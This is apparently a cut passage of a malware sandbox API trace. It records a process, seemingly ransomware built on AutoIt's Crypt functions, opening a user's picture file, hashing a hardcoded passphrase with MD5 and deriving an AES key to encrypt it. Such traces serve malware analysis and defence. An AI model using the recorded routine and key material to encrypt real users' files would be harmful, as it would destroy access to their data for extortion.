(in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca208, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0088.666] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\i5q_5Bq6.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\i5q_5bq6.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0088.666] FreeLibrary (hLibModule=0x772d0000) returned 1 [0088.666] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9e00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0088.666] CloseHandle (hObject=0x298) returned 1 [0088.666] FreeLibrary (hLibModule=0x772d0000) returned 1 [0088.666] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0088.666] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\i5q_5Bq6.bmp", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789db490, ftCreationTime.dwHighDateTime=0x1d5e3fd, ftLastAccessTime.dwLowDateTime=0x350e5ad0, ftLastAccessTime.dwHighDateTime=0x1d5e336, ftLastWriteTime.dwLowDateTime=0x350e5ad0, ftLastWriteTime.dwHighDateTime=0x1d5e336, nFileSizeHigh=0x0, nFileSizeLow=0x1297e, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="i5q_5Bq6.bmp", cAlternateFileName="")) returned 0x41ac740 [0088.666] FindClose (in: hFindFile=0x41ac740 | out: hFindFile=0x41ac740) returned 1 [0088.666] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0088.666] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.666] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0088.667] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.667] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0088.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0088.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0088.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0088.667] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5360) returned 1 [0088.667] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0088.668] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0088.668] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0088.668] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0088.668] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.668] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0088.668] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.668] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0088.668] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0088.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca6d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0088.668] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0088.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0088.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0088.668] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0088.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0088.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0088.668] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.668] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca4c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0088.669] CryptHashData (hHash=0x41ac000, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0088.669] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.669] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0088.669] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0088.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca5c8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0088.669] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac000, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac640) returned 1 [0088.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0088.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0088.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0088.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0088.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0088.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0088.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0088.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0088.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0088.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0088.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0088.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0088.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0088.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0088.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0088.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0088.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0088.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0088.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0088.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0088.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0088.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0088.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0088.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0088.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.671] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0088.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0088.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0088.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0088.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0088.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0088.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0088.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0088.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0088.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0088.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0088.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0088.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0088.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0088.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0088.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0088.671] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0088.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0088.671] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0088.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0088.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0088.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0088.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0088.672] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0088.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0088.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0088.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0088.672] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0088.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0088.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0088.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0088.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0088.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0088.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0088.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0088.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0088.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0088.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0088.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0088.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa30 [0088.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9a0 [0088.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0088.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0088.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0088.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0088.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0088.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0088.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0088.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0088.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0088.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9d0 [0088.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0088.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca898 [0088.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0088.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0088.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca958 [0088.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca910 [0088.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0088.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0088.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0088.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0088.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0088.673] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0088.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0088.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca928 [0088.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0088.673] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0088.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0088.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0088.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0088.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0088.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0088.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0088.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0088.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0088.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0088.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0088.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0088.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0088.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0088.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0088.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0088.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0088.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0088.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0088.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0088.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0088.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0088.785] 